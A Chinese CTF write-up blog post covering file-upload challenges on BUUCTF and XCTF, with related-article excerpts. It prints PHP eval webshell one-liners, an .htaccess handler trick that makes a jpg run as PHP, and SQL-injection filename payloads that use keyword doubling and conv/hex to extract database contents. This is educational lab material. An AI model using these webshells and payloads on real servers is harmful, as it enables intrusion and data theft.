upload类型题目总结

最新推荐文章于 2025-03-19 13:21:13 发布
最新推荐文章于 2025-03-19 13:21:13 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: ctf记录 文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/limenzzz/article/details/124154403
版权

目录

一.buuctf:

1.[GXYCTF2019]BabyUpload1

 2.[ACTF2020 新生赛]Upload1

 3.你传你🐎呢

二.攻防世界

1.upload1

 2.upload

三.总结

附言

一.buuctf:

1.[GXYCTF2019]BabyUpload1

首先尝试上传php文件,果不其然过滤了php后缀名

改后缀名为jpg,发现还是不行

应该是对内容也有所过滤,看了看wp说是对<?过滤(但不知道是怎么猜出来的)

用js引用绕过过滤。

<script language='php'>eval($_POST['v']);</script>

这题似乎只有jpg类型可以上传,其他就连png,gif都不行。

而且需要使用apache的.htaccess漏洞才行,这里贴上学习链接

利用.htaccess文件攻击上传Shell - Godbn - 博客园

构造.htaccess文件

<FilesMatch "123.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

 注意要用bp修改类型为jpg,不然上传不上去。

 

 根据提示的地址可以得知蚁剑所需网址。注意需删去/upload前(因为默认从html文件夹开始,而且要在之前构造的webshell地方输入123.jpg)

 于是蚁剑地址

http://c2fbe8b1-488f-4e22-82ab-62bd58f971de.node4.buuoj.cn:81/upload/a26dffe4b947722dd25cc1c2122f3280/123.jpg

在根目录找到flag 

 2.[ACTF2020 新生赛]Upload1

这道题对比上道还行,尝试直接上传php类型文件发现不行

 于是上传jpg文件抓包改后缀名。直接php被过滤不行,那就改php1,php2,phtml等成功上传

 提示地址,用蚁剑连上获取flag

 3.你传你🐎呢

和之前的babyupload差不多,利用阿帕奇的.htaccess漏洞

构造同上.htaccess文件上传(记得抓包改文件类型再上传)

 接着构造一句话木马后上传

 在根目录找到flag。

二.攻防世界

1.upload1

这提比较简单,构造一句话木马改后抓包上传

最后没在根目录找到flag,在html下找到flag

 2.upload

这题结合了sql注入和文件上传,确实是看了大佬的wp才知道怎么做。而且要用到conv函数来返回(因为题目过滤字母回显,而conv能返回ASCII码来避免过滤)

这里贴上学习链接

mysql的conv的用法 - 捏捏nienie - 博客园

a' +(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg

 最后构造的是这样的文件名称,这里hex是将字符串转换为十六进制,注意这里substr函数截取不能太多不然会变成科学计数法。

转换成十六进制后再转为ASCII得到

应该只是一部分,再次构造

a' +(selselectect conv(substr(hex(database()),12,16),16,10))+ '.jpg

 

拼接得到web_upload库

 接下来构造payload查表名

a'+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromominformation_schema.TABLES where TABLE_SCHEMA = 'web_upload' limit 1,1)),1,12),16,10))+'.jpg
a'+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromominformation_schema.TABLES where TABLE_SCHEMA = 'web_upload' limit 1,1)),13,12),16,10))+'.jpg
a'+(seleselectct+CONV(substr(hex((selselectect TABLE_NAME frfromominformation_schema.TABLES where TABLE_SCHEMA = 'web_upload' limit 1,1)),25,12),16,10))+'.jpg

 

然后查列名

s '+(seleselectct+CONV(substr(hex((seselectlect COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME = 'hello_flag_is_here' limit 0,1)),1,12),16,10))+'
s '+(seleselectct+CONV(substr(hex((seselectlect COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME = 'hello_flag_is_here' limit 0,1)),13,12),16,10))+'

 

查字段值

s '+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),1,12),16,10))+'.jpg
s '+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),13,12),16,10))+'.jpg
s '+(seleselectct+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here limit 0,1)),25,12),16,10))+'.jpg

 得到flag(不用套任何东西)

!!_@m_Th.e_F!lag

注意:这里判断是否已经取完字符看回显的数字大小,一般比之前的十进制数位数少就说明取完了

三.总结

总的来说简单题目就是构造一句话木马,寻找可行的上传类型,改类型上传,最后用蚁剑。

较难的题目就是使用阿帕奇的.htaccess漏洞,上传.htaccess文件再上传一句话木马,最后用蚁剑。

其他更难的题目就是像攻防世界里upload一样结合了上传和其他知识的题目,那就要结合题目思考了。

附言

文件上传就在这里告一段落,接下来总结一下xss再加上几道例题吧,希望自己不要鸽了。

希望自己不要这么菜吧   _(:з」∠)_   ----L1men2 

【网络安全 | CTF】攻防世界 upload1 解详析
等风来
05-24 6455
其中用到了 JavaScript 中的 Array 原型对象和条件判断语句。该代码通过扩展 Array 原型对象添加了一个名为 contains 的函数,用于判断一个对象是否在数组中,主要应用于判断上传文件的扩展名是否属于指定的图片格式,这里是 [‘jpg’,‘png’]这段代码的作用是检查上传文件的扩展名是否符合要求,如果是图片格式(jpg或png),则启用提交按钮,否则禁用提交按钮并弹出提示消息。上传时抓包,修改filename文件后缀为。考察文件上传,具体原理及姿势不再赘述。
upload-labs】1-21关随文经验总结
helin2020的博客
11-25 1986
这里很明显,就是查后缀,如果在白名单里就重命名文件,所以无法使用双后缀绕过,也没有可控路径来给我们%00截断,而如果不在白名单之内,就会删除我们上传的文件,unlink就是删除文件的函数.这里重点就是它是先上传到临时目录,再判断类型,最后再进行的文件删除,那么这里就是我们的突破口了。对于过滤为空白符,最经典的就是双写绕过了.非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。
upload-lab解1~20
一枚努力的蛋蛋
07-20 4671
upload-lab解Pass-01Pass-02Pass-03Pass-04 Pass-01 javascript绕过,通过抓包修改文件后缀名 Pass-02 对MIME类型进行了检查,抓包修改MIME类型即可 Pass-03 黑名单绕过 批量fuzz后缀名上传文件,比如cer,phtml等等偏僻的后缀都有可能被解析运行 在phpstudy中需要添加部署环境 Pass-04 思...
upload 1--10步骤
2301_80548709的博客
11-18 530
数据类型的黑名单验证突破又主要是例如:大小写绕过, .号绕过, 空格绕过, ::$DATA绕过, 双写绕过等。这里content-type判定的不符合我们的要求,那我们就将其改一下,因为他希望我们上传图片。但是我们可以操作后缀更改,上图中就没有对空格的去除所以我会在burp中加上一个空格。二.我们经历了前端验证,现在就要开始后端验证了,而后端验证很多都可以改文件名跳过,我们发现全都检查了,我们还可以 . . 的方法,因为他们只检查一次。首先,我们选择一个.php的文件上传。所以,我改一下上传,
[GXYCTF2019]BabyUpload1 通关记录
最新发布
2402_88178163的博客
03-19 736
所以他可能是存在对文本内容有后端检测这时我们尝试去掉一句话木马的一些东西比如<> <?上传后发现提示不能有ph 这时phtml php3 php5我们就不进行绕过考虑了 这时我们抓包进行分析看看是哪的问 这里我们仅仅修改了上传名 改为了jpg后缀 他又给我们进行了报错但是我们可以发现报错内容和不改后缀之前存在不同。发现是可以上传成功的 但是这时候问就来了 虽然我们成功上传了文件但是它是一个jpg后缀的文件 如果网页不存在文件包含漏洞我们直接访问文件位置 里面的代码是无法被直接解析的。
CTF练习——Upload上传的一道解思路
Jum的博客
08-11 3910
好久没有去联系联系了,今天做了一道关于Upload,分享一下 目录 拿题目 找思路 得到结果 成功 拿题目 这道题目是百度CTF题目干如下: 找思路 干中提示 tips:flag在flag.php中。看到干后,可以上传任意文件,并且上传之后可以打开文件,想到上传一段php代码来打开flag.php页面: <?php $fh=fopen('../flag.php','r'); echo fread($fh,filesize("../flag.php")); ...
upload-labs解(1)
YIHAHUHA的博客
11-09 612
0x00:js绕过 上传的文件在网页本地,可以直接修改js代码 上传的时候调用了一个本地的js函数:checkFlie();查看checkfile 发现只是允许jpg,png,和gif图片上传 禁用js的checkfile函数 修改checkfile函数 先上传图片格式的一句话木马,然后抓包改包修改回来 1.上传的时候不调用js 2.修改checkfile函数,把php也加入允许范围 3.先上传...
upload-labs19-20以及总结1
08-08
题目描述和源码分析,我们可以看到存在几个关键的防御措施,但同时也存在明显的漏洞。首先,我们需要理解文件上传的基本流程及其潜在的安全风险。 文件上传是Web应用中常见的一种功能,允许用户将本地文件上传到...
文件上传漏洞的学习和总结(upload-labs)
古语静水流深
06-11 2664
1.什么是文件上传漏洞: 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问,有问的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 2. ...
“百度杯”CTF比赛 九月场--web Upload
hanjinrui15的博客
12-30 730
“百度杯”CTF比赛 九月场--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
upload labs靶场
2401_87576048的博客
02-01 1202
思路:观察源代码发现其会直接看.后面的后缀 然后判断可以上传的时候 后缀名字为.php空格 .jpg就可以通过了,因为windows解析时候会自动将空格删除,所以不要害怕文件打不开,而题目过滤时却会读取到jpg,所以可以成功绕过。+++hp版本为apache版本才有的漏洞)
【极客大挑战2019】Upload
Bird&Bird
10-26 4163
1、打开BUUCTF在线评测,选择web---->【极客大挑战2019】Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
Upload-labs做记录(全20)
ma963852的博客
03-14 3144
目录 1,前端验证 2,MIME类型检测 3,黑名单检测 4,黑名单检测 5,黑名单检测 6,黑名单检测 7,黑名单检测 8,黑名单检测 9,黑名单检测 10,黑名单检测 11,白名单检查 12,白名单检查 13,文件头检测 14,getimagesize()检查是否为图片文件 15,exif_imagetype()检查是否为图片文件 16,二次渲染 17,上传后检测文件后缀名,若符合则对文件进行重命名,不符合则删除文件。 18, 19,不对文件进行检测,只对保存路
【CTF-Web】文件上传漏洞学习笔记(ctfshow题目
m0_74825746的博客
12-11 1238
再上传一个png 改后缀为php 好!寄可以看到msg没有正常显示位置 上传失败所以我们使用配置文件去解析一下,配置文件有两个 下面分别介绍一下Reference1.user.ini在nginx或者Apache服务中都可以使用利用条件:open_basedir没有被限制利用原理:使用该配置文件可以让所有php文件自动包含某个文件: 在加载打开的php文件的第一行代码之后加载配置指定的php文件: 在加载打开的php文件的第一行代码之前加载配置指定的php文件上传一句话木马图片上传配置文件。
CTF做笔记--upload
Hasur的博客
03-02 1230
我们直接来看这道题目,在这里我们可以发现上传任何的文件都可以说是上传成功,这一点和其他的文件上传漏洞不太一样,其他的大部分都是通过限制上传危险文件,但这个并不是。而且在上传完文件之后,也没有给出文件的上传路径,但是会回显出文件名。如上图所示,这里回显出来了我们的文件名这里比较关键的是需要我们想到这里可以利用sql注入来获取flag当然,这里是图片文件名存在注入,并且过滤了select from ,我们通过用双写就能绕过在做这道之前,我们需要去了解一个函数:CONV()
CTF之upload
qq_74263993的博客
05-19 622
那我们就使用hex()和conv()两个函数,将字符转换成16进制再转换成十进制,123' +(selecselectt conv(hex(database()),16, 10))+ '.jpg,但是发现变成科学计数法了,经过多次尝试发现当输出的数字超过12位后便会以科学计数法的方式输出。那么便抓包修改一下,我们上传一个图片格式文件,将名字里加个select,发现上传后的文件没了select这个字符串,那么应该就是存在文件名位置的sql注入了,而select应该是被过滤成空了。
文件上传 upload-labs 1~20做记录
小锤队长的博客
05-07 5376
pass-01: 解思路:(绕开前端js检测) (1):F12 ,直接修改js 允许文件的上传类型 , (2):将webshell 文件后缀名改为允许上传的,然后用 burp suite 拦截后修改 文件后缀名 , (3):利用 浏览器插件 Noscrip 屏蔽js脚本 pass-02: 操作过程: 1,禁用了js 脚本依旧不能上传,猜测可能是 content-type 检测 ...
BUUCTF web Upload
2301_79555897的博客
09-04 471
使用蚁剑连接,这里需要猜测上传文件路径,最终路径后面改为。但是有个提醒,弹窗警告,说明前端做了过滤,有两种思路。搜索javascript,关闭即可。上传有关的就先写一个简单的木马,一句话木马。和上一一样,我这里直接用的的上一个的文件。会到靶机页面,刷新后继续上传即可。不是图片格式,用bp抓包,改消息头。密码为 a 密码为自己设定的。在文件根目录下找到flag。利用bp更改后缀为phtml。在根目录后面找flag就行。直接利用蚁剑连接后缀为。蚁剑连接,url后缀。
文件上传(最后几
weixin_46601374的博客
03-01 2053
话说各位友友们,有没有看过《中华人民共和国网络安全法》 没别的意思,就是想让大家看看 IIS6.0解析漏洞 IIS6.0解析漏洞,其实有一些不如说是IIS6.0的一些特性,严格意义上而言,只是一些默认配置并不是漏洞 但是也有一些的确是漏洞 IIS6.0解析漏洞(一): IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa .cer .cdx 也会当做asp去解析,这是因为IIS6.0在应用程序扩展中默认设置了.asa .cer .cdx 都会调用 asp.dll
upload-labs通关
05-12
2. 仔细阅读每个挑战的题目和描述,理解题目要求和目标。 3. 使用常见的文件上传工具(如Burp Suite、Postman等)进行测试,尝试上传各种类型的文件。 4. 对于每个挑战,尝试各种可能的攻击方式,如修改请求头、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值